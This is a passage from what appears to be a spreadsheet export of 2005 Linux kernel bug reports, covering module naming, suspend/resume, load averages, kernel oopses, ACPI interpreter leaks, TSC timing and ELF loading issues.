    <t>Most recent kernel where this bug did not occur:- Distribution: Mainline Kernel Hardware Environment: Intel i386 architecture Software Environment: 2.6.14-rc1 Linux Kernel Problem Description: Module with names such as current and init_stack show a different name(expand to their respective definitions) when listed with lsmod Steps to reproduce: 1. Write a simple module named current.c. As an eg, #include &lt;linux/types.h&gt; #include &lt;linux/init.h&gt; #include &lt;linux/kernel.h&gt; #include &lt;linux/module.h&gt; #include &lt;linux/config.h&gt; static int __init ifunc(void) { return 0; } static void __exit efunc(void) { } module_init(ifunc) module_exit(efunc) 2. Create Makefile with contents as: obj-m := current.o 3.Build using kbuild. 4. insmod current.ko and lsmod Module Size Used by get_current() 1280 0 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ===&gt; wrong module name(current macro expand to get_current()) A patch which fixes this problem is : scripts/Makefile.lib | 2 +- scripts/mod/modpost.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) --- linux/scripts/Makefile.lib.orig 2005-03-02 10:38:09.000000000 +0300 +++ linux/scripts/Makefile.lib 2005-09-20 13:14:13.000000000 +0400 @@ -96,7 +96,7 @@ depfile = $(subst $(comma),_,$(@D)/.$(@F # than one module. In that case KBUILD_MODNAME will be set to foo_bar, # where foo and bar are the name of the modules. basename_flags = -DKBUILD_BASENAME=$(subst $(comma),_,$(subst -,_,$(*F))) -modname_flags = $(if $(filter 1,$(words $(modname))),-DKBUILD_MODNAME=$(subst $(comma),_,$(subst -,_,$(modname)))) +modname_flags = $(if $(filter 1,$(words $(modname))),-D"DUM(a)=\#a" - D"KBUILD_MODNAME=DUM($(subst $(comma),_,$(subst -,_,$(modname))))") _c_flags = $(CFLAGS) $(EXTRA_CFLAGS) $(CFLAGS_$(*F).o) _a_flags = $(AFLAGS) $(EXTRA_AFLAGS) $(AFLAGS_$(*F).o) --- linux/scripts/mod/modpost.c.orig 2005-07-23 04:41:06.000000000 +0400 +++ linux/scripts/mod/modpost.c 2005-09-20 13:19:21.000000000 +0400 @@ -575,7 +575,7 @@ add_header(struct buffer *b, struct modu buf_printf(b, "#undef unix\n"); /* We have a module called "unix" */ buf_printf(b, "struct module __this_module\n"); buf_printf(b, "__attribute__((section(\".gnu.linkonce.this_module\"))) = {\n"); - buf_printf(b, " .name = __stringify(KBUILD_MODNAME),\n"); + buf_printf(b, " .name = KBUILD_MODNAME,\n"); if (mod-&gt;has_init) buf_printf(b, " .init = init_module,\n"); if (mod-&gt;has_cleanup) NOTE: This problem has been reported by Roman and subsequent patch has been described in the mailing list(which is the one above) by me.</t>
  </si>
  <si>
    <t>Frieder B</t>
  </si>
  <si>
    <t>S3 resume: no video - Toshiba Satellite Pro 6000</t>
  </si>
  <si>
    <t>2.6.14-rc2, rc3, final</t>
  </si>
  <si>
    <t>2005-10-02 16:40 UTC</t>
  </si>
  <si>
    <t>2006-08-09 20:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.2 Distribution: Slackware 10.1 Hardware Environment: Toshiba Satellite Pro 6000 laptop Software Environment: Xorg 6.8.2, XFCE 4.2, acpid 1.0.4 Problem Description: After resuming from S3 (suspended while in X), the LCD panel stays black . However, the laptop is up again, and I can SSH into it from another machine. I can get the panel working again, when I first direct video output to the CRT output of the laptop, and then back to LCD (done by repeatedly hitting Fn+F5 buttons on the Toshiba, which directs output to either LCD, CRT or TV) None of this ever happened with older kernels. Steps to reproduce: - boot with 2.6.14-rc2 or rc3 - suspend to S3 (done by closing lid) - resume from S3 (done by opening lid) - notice how laptop resumes but screen stays black</t>
  </si>
  <si>
    <t>crazy loadavg detected by top and nagios</t>
  </si>
  <si>
    <t>2.6.14-rc3</t>
  </si>
  <si>
    <t>2005-10-02 16:42 UTC</t>
  </si>
  <si>
    <t>2005-10-03 18:02 UTC</t>
  </si>
  <si>
    <t>Reported to Fedora rawhide bugzilla. https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169696 top - 09:17:38 up 1:00, 5 users, load average: 350152.19, 318442.47, 651266.8Tasks: 114 total, 1 running, 113 sleeping, 0 stopped, 0 zombie Cpu(s): 19.6% us, 17.3% sy, 18.2% ni, 8.0% id, 7.1% wa, 11.9% hi, 17.9% si Mem: 1024592k total, 992044k used, 32548k free, 52792k buffers Swap: 2048236k total, 0k used, 2048236k free, 541640k cached Actual results: Load avgs bounce around all over the place: -667287.09, 493018.25, ... Expected results: Average in range 0 to +20 or so. No -ve values. Nothing above 100 or so.</t>
  </si>
  <si>
    <t>Kernel oops with mail loading test</t>
  </si>
  <si>
    <t>2005-10-03 10:26 UTC</t>
  </si>
  <si>
    <t>2008-02-07 23:00 UTC</t>
  </si>
  <si>
    <t>Distribution: 2.6.12.5 Hardware Environment: Dell Poweredge 1850, 1 CPU hyper threading enabled. Software Environment: Gnu C &lt;no gnu c present&gt;, built with gcc 3.4.4 binutils 2.16.1 util-linux 2.12q mount 2.12q module-init-tools 3.1 e2fsprogs 1.38 reiserfsprogs 3.6.19 Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 udev 030 Modules Loaded hostname# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Pentium(R) 4 CPU 3.20GHz stepping : 1 cpu MHz : 3200.983 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe pni monitor ds_cpl cid xtpr bogomips : 6324.22 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Pentium(R) 4 CPU 3.20GHz stepping : 1 cpu MHz : 3200.983 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe pni monitor ds_cpl cid xtpr bogomips : 6389.76 Problem Description: I was trying to load test a machine with around 1000000 virus messages and 1000000 spam messages. This load has been handled before by the system. But for some reasons today I saw the following oops. Oct 1 12:12:51 hostname Unable to handle kernel paging request at virtual address 0002009f Oct 1 12:12:51 hostname printing eip: Oct 1 12:12:51 hostname c024c7de Oct 1 12:12:51 hostname *pde = 0d659001 Oct 1 12:12:51 hostname *pte = 00000000 Oct 1 12:12:51 hostname Oops: 0000 [#1] Oct 1 12:12:51 hostname PREEMPT SMP Oct 1 12:12:51 hostname Modules linked in: Oct 1 12:12:51 hostname CPU: 1 Oct 1 12:12:51 hostname EIP: 0060:[&lt;c024c7de&gt;] Not tainted VLI Oct 1 12:12:51 hostname EFLAGS: 00010292 (2.6.12.5) Oct 1 12:12:51 hostname EIP is at init_dev+0x1f/0x610 Oct 1 12:12:51 hostname eax: 433edfb4 ebx: c04f2f80 ecx: 00000000 edx: 00020003 Oct 1 12:12:51 hostname esi: 00020003 edi: 00000000 ebp: 00500000 esp: dd759e8c Oct 1 12:12:51 hostname ds: 007b es: 007b ss: 0068 Oct 1 12:12:51 hostname Process metric-get-queu (pid: 13213, threadinfo=dd758000 task=e9ad0020) Oct 1 12:12:51 hostname Stack: f7cd8dd0 c4c27000 f7cd8dd0 c2137f00 c02175dd 00000000 00000000 00000101 Oct 1 12:12:51 hostname 00000001 00000000 ffffffe8 c015e956 f70fd998 00000000 dd759f58 c04f2f80 Oct 1 12:12:51 hostname f442fc80 00000000 00500000 c024d7dd 00020003 433edfb4 dd759eec 88020006 Oct 1 12:12:51 hostname Call Trace: Oct 1 12:12:51 hostname [&lt;c02175dd&gt;] strncpy_from_user+0x41/0x63 Oct 1 12:12:51 hostname [&lt;c015e956&gt;] get_unused_fd+0xa8/0xd0 Oct 1 12:12:51 hostname [&lt;c024d7dd&gt;] tty_open+0x9b/0x315 Oct 1 12:12:51 hostname [&lt;c024d742&gt;] tty_open+0x0/0x315 Oct 1 12:12:51 hostname [&lt;c0168737&gt;] chrdev_open+0xb3/0x172 Oct 1 12:12:51 hostname [&lt;c015e870&gt;] dentry_open+0x190/0x1ce Oct 1 12:12:51 hostname [&lt;c015e6db&gt;] filp_open+0x5c/0x61 Oct 1 12:12:51 hostname [&lt;c02175dd&gt;] strncpy_from_user+0x41/0x63 Oct 1 12:12:51 hostname [&lt;c015e956&gt;] get_unused_fd+0xa8/0xd0 Oct 1 12:12:51 hostname [&lt;c015ea72&gt;] sys_open+0x49/0x80 Oct 1 12:12:51 hostname [&lt;c01031e7&gt;] sysenter_past_esp+0x54/0x75 Oct 1 12:12:51 hostname Code: 8b 6c 24 20 83 c4 24 e9 fe fc ff ff 83 ec 4c 89 74 24 40 89 6c 24 48 89 5c 24 3c 89 7c 24 44 8b 74 24 50 c7 44 24 14 00 00 00 00 &lt;f6&gt; 86 9c 00 00 00 10 8b 6c 24 54 0f 85 ba 01 00 00 8b 86 ac 00 Oct 1 12:12:51 hostname.example.com ERROR lang.Class:137 - [error, Thread-7] Command timeout. cmd_line=/usr/bin/sudo /usr/local/product/metric-get-queue-msg.sh Oddly enough, mail kept on being delivered until: ct 1 12:56:10 hostname sm-mta[30930]: j91JuAwT030930: hostname2.example.com [10.211.4.71] did not issue MAIL/EXPN/VRFY/ETRN during connection to Daemon1 At which time connections stopped succeeding, and finally, the load average just became too high on the machine for any mail to be accepted at all Oct 1 13:08:34 hostname sm-mta[6789]: delaying connections on daemon Daemon0: load average=242 &gt;= 200 The load average stayed that way until the machine was rebooted today (hard powercycle), and things were back to normal at that point. Steps to reproduce: None.</t>
  </si>
  <si>
    <t>documentation: v9fs documentation is incorrect</t>
  </si>
  <si>
    <t>2005-10-03 11:21 UTC</t>
  </si>
  <si>
    <t>Named object passed as a BitIndex or NumBits to CreateField causes hang</t>
  </si>
  <si>
    <t>2005-10-04 06:10 UTC</t>
  </si>
  <si>
    <t>2007-01-15 08:52 UTC</t>
  </si>
  <si>
    <t>DerefOf doesn't evaluate String to Object</t>
  </si>
  <si>
    <t>2005-10-04 08:38 UTC</t>
  </si>
  <si>
    <t>Failed to interpret AML code alternated with Method declarations</t>
  </si>
  <si>
    <t>2005-10-04 11:18 UTC</t>
  </si>
  <si>
    <t>airo.ko disabled under x86_64</t>
  </si>
  <si>
    <t>2005-10-04 15:20 UTC</t>
  </si>
  <si>
    <t>Matteo Croce</t>
  </si>
  <si>
    <t>2010-08-30 23:22 UTC</t>
  </si>
  <si>
    <t>In drivers/net/wireless/Kconfig there is an unneeded dependency that prevent the driver to compile on x86_64: config AIRO tristate "Cisco/Aironet 34X/35X/4500/4800 ISA and PCI cards" depends on NET_RADIO &amp;&amp; ISA &amp;&amp; (PCI || BROKEN) should be: config AIRO tristate "Cisco/Aironet 34X/35X/4500/4800 ISA and PCI cards" depends on NET_RADIO &amp;&amp; ISA_DMA_API &amp;&amp; (PCI || BROKEN) Tested works fine for me. Best Regards, Matteo Croce</t>
  </si>
  <si>
    <t>[2.6.14] Regression - Function+F7 key in console deadlocks kernel</t>
  </si>
  <si>
    <t>2005-10-04 16:58 UTC</t>
  </si>
  <si>
    <t>2005-11-22 01:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.9 to akpm: "As of 2.6.9 in Linux console, it properly switches between modes, there is a small delay when switching to external VGA (if you have sound playing it will repeat for a moment then resume).</t>
  </si>
  <si>
    <t>synchronize_tsc_bp can zero the TSC during a lost ticks measurement</t>
  </si>
  <si>
    <t>2005-10-04 18:16 UTC</t>
  </si>
  <si>
    <t>2006-05-09 17:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown -- long ago, probably Distribution: Hardware Environment: i386 and x86_64 Software Environment: Problem Description: I verified this in 2.6.11 since it was handy on lxr.linux.no, but it probably exists in most kernel versions. Also, the bug appears to be present in both the i386 and x86_64 arch even though it's in arch-specific code. The basic problem is that (in some system configurations) the timer interrupt handler uses the TSC to determine whether some ticks have been lost, but the kernel synchronizes the TSCs by zeroing them all *after* timer interrupts have been started. Thus at the next timer interrupt, lost ticks are computed as a value from after the reset (near 0) minus a value from before the reset. This overflows and produces a garbage value that can be either positive or negative (the details of the arithmetic differ between x86_64 and i386, but the value is garbage on both). If it's positive, it looks like a large number of ticks have been lost and they get spuriously added to the jiffies counter. This in turn can cause timeouts to go off before they should. Here are some more details for x86_64. i386 is generally similar. arch/x86_64/kernel/smpboot.c:smp_boot_cpus() if (!skip_ioapic_setup &amp;&amp; nr_ioapics) setup_IO_APIC(); // calls check_timer() - hooks up PIT IRQ else nr_ioapics = 0; setup_boot_APIC_clock(); /* * Synchronize the TSC with the AP */ if (cpu_has_tsc &amp;&amp; cpucount) synchronize_tsc_bp(); // Clear TSCs of all cpus setup_IO_APIC() calls check_timer(). check_timer() goes through various schemes of hooking up the PIT IRQ. On success, it leaves it in the unmasked state and from that point on we get timer interrupts. synchronize_tsc_bp() is called after PIT timer interrupts are enabled. This function clears TSC on all cpus. By the time TSC is cleared, the BSP is guaranteed to have received at least 4 PIT interrupts (otherwise check_timer() would have declared it nonworking). The timer interrupt code has some logic to compensate for lost interrupts. TSC of the last interrupt is saved in vxtime.last_tsc. However, when Linux clears TSC in synchronize_tsc_bp(), it does not clear any state in vxtime. As a result, the next timer interrupt _after_ TSC is cleared can get confused and think that lots of time was lost. Whether this happens or not is non-deterministic. "offset" variable that captures the time since the last timer, is declared "int". It could end up positive or negative. offset = (((tsc - vxtime.last_tsc) * vxtime.tsc_quot) &gt;&gt; 32) - (USEC_PER_SEC / HZ); The number of lost ticks in "lost" is a function of offset which could be bogus. Here is all relevant code: arch/x86)64/kernel/time.c:timer_interrupt(), VXTIME_TSC case: unsigned long tsc, lost = 0; int delay, offset = 0; if (vxtime.mode == VXTIME_HPET) { ... // we do not go here } else { offset = (((tsc - vxtime.last_tsc) * vxtime.tsc_quot) &gt;&gt; 32) - (USEC_PER_SEC / HZ); if (offset &lt; 0) offset = 0; if (offset &gt; (USEC_PER_SEC / HZ)) { lost = offset / (USEC_PER_SEC / HZ); offset %= (USEC_PER_SEC / HZ); } monotonic_base += (tsc - vxtime.last_tsc)*1000000/cpu_khz ; vxtime.last_tsc = tsc - vxtime.quot * delay / vxtime.tsc_quot; if ((((tsc - vxtime.last_tsc) * vxtime.tsc_quot) &gt;&gt; 32) &lt; offset) vxtime.last_tsc = tsc - (((long) offset &lt;&lt; 32) / vxtime.tsc_quot) - 1; } if (lost) { if (report_lost_ticks) { printk(KERN_WARNING "time.c: Lost %ld timer " "tick(s)! ", lost); print_symbol("rip %s)\n", regs-&gt;rip); } jiffies += lost; }</t>
  </si>
  <si>
    <t>ipw2200 module ooopses kernel due to division by zero</t>
  </si>
  <si>
    <t>2005-10-05 01:08 UTC</t>
  </si>
  <si>
    <t>Ismail D</t>
  </si>
  <si>
    <t>2005-10-23 10:11 UTC</t>
  </si>
  <si>
    <t>ipw2200 module oopses when I do iwlist eth0 scan giving different backtraces but with same problem : Backtrace #1: divide error: 0000 [#1] last sysfs file: /power/state Modules linked in: md5 ipv6 snd_pcm_oss snd_mixer_oss snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device eth1394 ohci_hcd e100 ohci1394 yenta_socket rsrc_nonstatic pcmcia_core i2c_i801 i2c_core ehci_hcd uhci_hcd snd_hda_intel usbcore snd_hda_codec snd_pcm snd_timer snd snd_page_alloc i915 drm sony_acpi cpufreq_powersave cpufreq_ondemand ieee80211_crypt_tkip ieee80211_crypt_ccmp ieee80211_crypt_wep ipw2200 firmware_class ieee80211 ieee80211_crypt CPU: 0 EIP: 0060:[&lt;e003f659&gt;] Not tainted VLI EFLAGS: 00010083 (2.6.14-rc2-mm1) EIP is at ieee80211_wx_get_scan+0x999/0xa60 [ieee80211] eax: fffa8920 ebx: 00000000 ecx: 00000000 edx: ffffffff esi: 00000000 edi: fffa8920 ebp: d1665eb3 esp: d1665ce0 ds: 007b es: 007b ss: 0068 Process iwlist (pid: 14016, threadinfo=d1664000 task=d0c4da70) Stack: d1665eb0 00000010 e004013b 00000036 e0040137 dd4c004f de5462fc d1b3d056 6c000000 00000005 d1b3d09d d1b3e000 00000286 dd4c0000 d1665f38 de546240 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Call Trace: [&lt;e005dd11&gt;] ipw_abort_scan+0x21/0x30 [ipw2200] [&lt;e005df93&gt;] ipw_request_scan+0x273/0x280 [ipw2200] [&lt;c0140ab5&gt;] prep_new_page+0x55/0x70 [&lt;c0281a91&gt;] wireless_process_ioctl+0x1f1/0x6b0 [&lt;c014b8e5&gt;] do_anonymous_page+0xc5/0x110 [&lt;e005e950&gt;] ipw_wx_get_scan+0x0/0x10 [ipw2200] [&lt;c0277de9&gt;] dev_ioctl+0x1a9/0x280 [&lt;c026da6a&gt;] sock_ioctl+0x20a/0x210 [&lt;c026d860&gt;] sock_ioctl+0x0/0x210 [&lt;c0169896&gt;] do_ioctl+0x56/0x70 [&lt;c01699ee&gt;] vfs_ioctl+0x5e/0x1c0 [&lt;c0169b8d&gt;] sys_ioctl+0x3d/0x70 [&lt;c0102e6f&gt;] sysenter_past_esp+0x54/0x75 Code: 04 b6 8d 04 80 8d 3c 85 00 00 00 00 0f be 41 30 89 d9 c1 e1 04 29 d9 29 c2 89 d0 c1 e0 05 29 d0 8d 04 41 0f af d0 29 d7 89 f8 99 &lt;f7&gt; fe 3c 64 88 84 24 84 01 00 00 76 0e b0 64 88 84 24 84 01 00 Backtrace #2: divide error: 0000 [#1] last sysfs file: /devices/pci0000:00/0000:00:1d.7/usb5/5-0:1.0/bInterfaceProtocol Modules linked in: md5 ipv6 snd_pcm_oss snd_mixer_oss snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device acx eth1394 ohci_hcd ohci1394 yenta_socket rsrc_nonstatic pcmcia_core i2c_i801 i2c_core ehci_hcd usbhid uhci_hcd snd_hda_intel usbcore snd_hda_codec snd_pcm snd_timer snd snd_page_alloc i915 drm sony_acpi cpufreq_powersave cpufreq_ondemand ieee80211_crypt_tkip ieee80211_crypt_ccmp ieee80211_crypt_wep ipw2200 firmware_class ieee80211 ieee80211_crypt e100 CPU: 0 EIP: 0060:[&lt;e004f659&gt;] Not tainted VLI EFLAGS: 00010093 (2.6.14-rc2-mm1) EIP is at ieee80211_wx_get_scan+0x999/0xa60 [ieee80211] eax: fffed752 ebx: 00000000 ecx: 00000000 edx: ffffffff esi: 00000000 edi: fffed752 ebp: cb547eb3 esp: cb547ce0 ds: 007b es: 007b ss: 0068 Process iwlist (pid: 19655, threadinfo=cb546000 task=d1052550) Stack: cb547eb0 00000010 e005013b 00000036 e0050137 dd5c0153 de8682fc dbf9d052 6c000000 00000008 dbf9d099 dbf9e000 00000286 dd5c0108 cb547f38 de868240 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Call Trace: [&lt;e006df0d&gt;] ipw_request_scan+0x1ed/0x280 [ipw2200] [&lt;c0140ab5&gt;] prep_new_page+0x55/0x70 [&lt;c0281a91&gt;] wireless_process_ioctl+0x1f1/0x6b0 [&lt;c014b8e5&gt;] do_anonymous_page+0xc5/0x110 [&lt;e006e950&gt;] ipw_wx_get_scan+0x0/0x10 [ipw2200] [&lt;c0277de9&gt;] dev_ioctl+0x1a9/0x280 [&lt;c026da6a&gt;] sock_ioctl+0x20a/0x210 [&lt;c026d860&gt;] sock_ioctl+0x0/0x210 [&lt;c0169896&gt;] do_ioctl+0x56/0x70 [&lt;c01699ee&gt;] vfs_ioctl+0x5e/0x1c0 [&lt;c0169b8d&gt;] sys_ioctl+0x3d/0x70 [&lt;c0102e6f&gt;] sysenter_past_esp+0x54/0x75 Code: 04 b6 8d 04 80 8d 3c 85 00 00 00 00 0f be 41 30 89 d9 c1 e1 04 29 d9 29 c2 89 d0 c1 e0 05 29 d0 8d 04 41 0f af d0 29 d7 89 f8 99 &lt;f7&gt; fe 3c 64 88 84 24 84 01 00 00 76 0e b0 64 88 84 24 84 01 00</t>
  </si>
  <si>
    <t>Unexpected exception on Store of ThermalZone to Debug operation</t>
  </si>
  <si>
    <t>2005-10-05 05:49 UTC</t>
  </si>
  <si>
    <t>Unexpected exception on Store of Device and ThermalZone elements of Package to Debug operation</t>
  </si>
  <si>
    <t>2.6.13.3</t>
  </si>
  <si>
    <t>No exception on DerefOf of an arbitrary Source</t>
  </si>
  <si>
    <t>2005-10-07 07:43 UTC</t>
  </si>
  <si>
    <t>Unexpected dereference of Index reference immediately passed to Method</t>
  </si>
  <si>
    <t>2005-10-07 07:56 UTC</t>
  </si>
  <si>
    <t>2008-04-30 20:51 UTC</t>
  </si>
  <si>
    <t>Unexpectedly CopyObject of immediately passed Index reference is not reference</t>
  </si>
  <si>
    <t>2005-10-07 08:13 UTC</t>
  </si>
  <si>
    <t>2008-04-30 20:50 UTC</t>
  </si>
  <si>
    <t>Copying the RefOf reference to Named object spoils that reference</t>
  </si>
  <si>
    <t>2005-10-07 08:20 UTC</t>
  </si>
  <si>
    <t>Zoran driver sleeps in invalid context</t>
  </si>
  <si>
    <t>2005-10-09 08:14 UTC</t>
  </si>
  <si>
    <t>2005-12-26 14:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown Distribution: Slackware 10.1 Hardware Environment: Athlon 2000+, 512Mo, Miro DC30 card Software Environment: mjpegtools-1.6.3-rc3 Problem Description: lavrec doesn't capture any frame, since the zr36067 driver stops due to sleeping function calls while interrupts are disabled. Steps to reproduce: Issue : lavrec -f a -i s -d 1 -U -n 256 -b 1024 -c 2 -g 768x576 -S test.avi on a PC with a Miro DC30 card. Kernel preemption is enabled on my system, I'll check if no premption can help. Appended: dmesg output after call trace dump.</t>
  </si>
  <si>
    <t>Wrong keymapping for logitech cordless desktop lx500</t>
  </si>
  <si>
    <t>2005-10-10 00:27 UTC</t>
  </si>
  <si>
    <t>Ryo Dairiki</t>
  </si>
  <si>
    <t>2007-06-25 01:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution: Fedora Core 4 Hardware Environment: Dell precision 670 (Xeon 2.8GHz x 2, SMP, 64bit) Software Environment: Problem Description: Recent model of keyboards sold by logitech have many extra keys. For example, "Homepage", "Eject CD", "Mute", "Mail", etc. Most of thier key works properly with hid driver, but I've found some of keys are wrongly mapped on mouse buttons and joystick buttons. This keyboard has wireless mouse which has left, middle, right buttons and 2-dimensional scrolling wheel. Unfornetuly, this wheel reports side scrolling events and 11 or 12 button events at the same time. I mean side scrolling events are reported twice at the same time. Steps to reproduce: 1. Turn on your computer with logitech lx500 connected to usb port. 2. Press "media" button or "library" button on your keyboard to find that they are wrongly mapped on mouse buttons. This is not the problem of X. This problem is occured even when you are on a text console. I've checked this by capturing output from /dev/event* devices. Keyboard: vender id = 0x046d, product id = 0xc512, version = 0x3007 Wrongly mapped keys: hid page = 0x00090000 (same as mouse buttons), application field = 0xc0001, physical field = 0 Messenger: hid = 1 Music: hid = 3 Digital (with the icon of "movie"): hid = 4 Library: hid = 5 My Document: hid = 10 Web Camera: hid = 19 Status (with the icon of "logout chat"): hid = 20 Record: hid = 21 Burn CD: hid = 22 Eject: hid = 23 Unknown (with the icon of "remote controler"): hid = 24 Cycle Windows: hid = 28 Help (Fn + F1): hid = 65 Word (Fn + F2): hid = 66 Excel (Fn + F3): hid = 67 ... Macro D (Fn + F12): hid = 76</t>
  </si>
  <si>
    <t>kernel kills valid ELF binaries.</t>
  </si>
  <si>
    <t>2.6.14rc3-git6</t>
  </si>
  <si>
    <t>2005-10-10 06:08 UTC</t>
  </si>
  <si>
    <t>Pawel Sikora</t>
  </si>
  <si>
    <t>2005-10-24 14:08 UTC</t>
  </si>
  <si>
    <t>Software Environment: binutils-2.16.91.0.3 Problem Description: The fs/binfmt_elf.c:load_elf_binary() always calls padzero() to fill the .bss section. If binary hasn't this section kernel will kill it immediately. (...) if (padzero(elf_bss)) { ^^^^^^^^^^^^^^^^ this method faults. send_sig(SIGSEGV, current, 0); retval = -EFAULT; /* Nobody gets to see this, but.. */ goto out_free_dentry; (...) Steps to reproduce: $ cat xxx.S .section .text .global _start _start: movl $1, %eax movl $0, %ebx int $0x80 .end $ as xxx.S -o xxx.o; ld xxx.o -o xxx -s; objdump -x xxx The output contains only .text section: Sections: Idx Name Size VMA LMA File off Algn 0 .text 0000000c 08048094 08048094 00000094 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE $ strace ./xxx execve("./xxx", ["./xxx"], [/* 37 vars */]) = -1 EFAULT (Bad address) --- SIGSEGV (Segmentation fault) @ 0 (0) --- +++ killed by SIGSEGV +++ Binaries with .bss or .data section are loaded without any errors. This bug blocks development of microapplications based on klibc.</t>
  </si>
  <si>
    <t>USB isn't producing correct hotplug events for interfaces</t>
  </si>
  <si>
    <t>2.6.14-r3</t>
  </si>
  <si>
    <t>2005-10-10 16:29 UTC</t>
  </si>
  <si>
    <t>2005-11-14 21:41 UTC</t>
  </si>
  <si>
    <t>We aren't exporting the proper INTERFACE info, and the MODALIAS variable is wrong for interfaces that have class specific data. This is causing udev to fail to load modules for cdc-acm devices.</t>
  </si>
  <si>
    <t>linux/console_struct.h without vt_mode struct defined (linux/vt.h)</t>
  </si>
  <si>
    <t>2005-10-11 11:35 UTC</t>
  </si>
  <si>
    <t>Allann Jones</t>
  </si>
  <si>
    <t>2006-04-22 07:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Fedora Core 1 Hardware Environment: Intel x86 Software Environment: Fedora 1, Linux 2.6.13.3 Problem Description: In file included from /home/ajoliveira/projects/genesis/src/keyboard-interrupt-handler/key-handler.c:29: include/linux/console_struct.h:53: error: field `vt_mode' has incomplete type Hypothetical solution: linux/console_struct.h without vt_mode struct defined (linux/vt.h), like I see, the struct vt_mode isn't protected with a #if*** directive, so, can'be included linux/vt.h directly in it? Steps to reproduce: In the code of your module include linux/console_struct.h</t>
  </si>
  <si>
    <t>Memory leak till the Method exit for each execution of If(TRUE)-Else/ElseIf</t>
  </si>
  <si>
    <t>2005-10-12 10:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: This is some type of "memory leak" bug (similar to 110 internal bug). The Linux kernel ACPI interpreter after completion the AML If(TRUE)-Else/ElseIf operation doesn't release some memory allocations. This issue has been revealed by the automated "Per-method execution memory consumption verification debug service" (PMEMCV) designed in those purposes and is not seen by the "Outstanding allocation" service (OAS). The summary amount of unused memory allocations increases per each run to that operation until the Method termination when only all the lists of memory allocations attached to that method are finally released. This type "memory leaks" are just revealed by PMEMCV when the memory is ineffectively used during the Method interpretation time. So if an OEM BIOS includes this code, the total effectiveness of memory consumption of Linux would decrease. Steps to reproduce: Run interpreter with the .asl demo code attached below to observe the slowing down of interpretation visually.</t>
  </si>
  <si>
    <t>Memory leak till the Method exit for each execution of Break</t>
  </si>
  <si>
    <t>2005-10-12 10:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: The "memory leak" bug. The Linux kernel ACPI interpreter after completion the AML Break operation doesn't release some memory allocations. The issue has been revealed by PMEMCV, is not seen by OAS (see bug 5422). Steps to reproduce: Run interpreter with the .asl demo code attached below to observe the slowing down of interpretation visually.</t>
  </si>
  <si>
    <t>Memory leak till the Method exit for each execution of Continue</t>
  </si>
  <si>
    <t>2005-10-12 10:21 UTC</t>
  </si>
  <si>
    <t>2007-01-15 08:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: The "memory leak" bug. The Linux kernel ACPI interpreter after completion the AML Continue operation doesn't release some memory allocations. The issue has been revealed by PMEMCV, is not seen by OAS (see bug 5422). Steps to reproduce: Run interpreter with the .asl demo code attached below to observe the slowing down of interpretation visually.</t>
  </si>
  <si>
    <t>Releasing memory of the inside Method scopes surrounding Return operation is needed</t>
  </si>
  <si>
    <t>2005-10-12 10:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: The "memory leak" bug. The issue has been revealed by PMEMCV, is not seen by OAS (see bug 5422). Investigation shows that when the Return operation is performed from the inside Method scopes surrounding that Return operation (If, While, Switch, etc..) the memory allocations related to those scopes are not immediately released (though them are released later in AcpiDsDeleteWalkState()). This puts obstacles in the way of PMEMCV development. In order to identify new anomalies by means of PMEMCV (without complicating that instrumentation) the old anomalies being already identified should be eliminated before that. When the new scope opening AML operators (If, While, etc..) are processed uninterruptedly (no Return) the memory utilized during interpretation of them is released properly (immediately, just after completion of each of them). Steps to reproduce: Doesn't require.</t>
  </si>
  <si>
    <t>2005-10-12 21:39 UTC</t>
  </si>
  <si>
    <t>2006-04-06 14:33 UTC</t>
  </si>
  <si>
    <t>compiling the latest -rc got: lib/ts_kmp.c:125: warning: initialization from incompatible pointer type lib/ts_bm.c:165: warning: initialization from incompatible pointer type lib/ts_fsm.c:318: warning: initialization from incompatible pointer type seems solved by - struct ts_config * (*init)(const void *, unsigned int, int); + struct ts_config * (*init)(const void *, unsigned int, gfp_t); in include/linux/textsearch.h:43: -- paolo</t>
  </si>
  <si>
    <t>SVGATextMode problem on 2.6.14-rc4</t>
  </si>
  <si>
    <t>2005-10-14 05:06 UTC</t>
  </si>
  <si>
